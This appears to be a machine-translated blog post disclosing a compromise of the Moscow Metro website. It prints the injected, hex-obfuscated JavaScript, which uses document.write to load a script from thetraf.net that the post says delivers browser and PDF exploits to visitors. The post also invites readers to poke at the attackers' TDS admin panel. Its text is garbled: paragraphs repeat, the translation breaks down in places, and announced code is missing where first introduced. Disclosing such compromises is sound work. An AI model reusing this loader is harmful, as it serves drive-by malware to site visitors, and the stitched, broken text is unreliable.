The official website of the Moscow Metro zatoyanili
We open the source code of any page mosmetro.ru , at the beginning we see the insertion of JavaScript code:
We look at the last line of the ill-fated file:
After the execution of this section on the page, one more script is added, but by an external link:
After several redirects, it throws to the browser a suitable JS exploit code that uses this or that actual vulnerability. Under Opera for Windows, for example, a malicious PDF file spontaneously opens, although the integration of the PDF viewer from Adobe Reader with the browser is disabled.
For those wishing to delve into the code, here is a sample of the JS code and a sample of the PDF document . Kaspersky Anti-Virus will detect the resulting PDF as Exploit.Win32.Pidief.cyk. The rest of the antivirus products are almost silently silent - VirusTotal report .
')
According to DomainTools and WebHosting.info , several more domains are attached to this host (located, of course, in China), presumably for similar purposes.
PS By the way, at thetraf.net/tds/admin address there is a password-protected entrance to the Sutra TDS admin panel (TDS - traffic distribution system) if anyone can pull out any details from there. :)
We look at the last line of the ill-fated file:
var _0xd5c2=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x74\x68\x65\x74\x72\x61\x66\x2E\x6E\x65\x74\x2F\x74\x64\x73\x2F\x69\x6E\x2E\x63\x67\x69\x3F\x64\x65\x66\x61\x75\x6C\x74\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xd5c2[1]](_0xd5c2[0]);After the execution of this section on the page, one more script is added, but by an external link:
After several redirects, it throws to the browser a suitable JS exploit code that uses this or that actual vulnerability. Under Opera for Windows, for example, a malicious PDF file spontaneously opens, although the integration of the PDF viewer from Adobe Reader with the browser is disabled.
For those wishing to delve into the code, here is a sample of the JS code and a sample of the PDF document . Kaspersky Anti-Virus will detect the resulting PDF as Exploit.Win32.Pidief.cyk. The rest of the antivirus products are almost silently silent - VirusTotal report .
')
According to DomainTools and WebHosting.info , several more domains are attached to this host (located, of course, in China), presumably for similar purposes.
PS By the way, at thetraf.net/tds/admin address there is a password-protected entrance to the Sutra TDS admin panel (TDS - traffic distribution system) if anyone can pull out any details from there. :)
Source: https://habr.com/ru/post/80912/
All Articles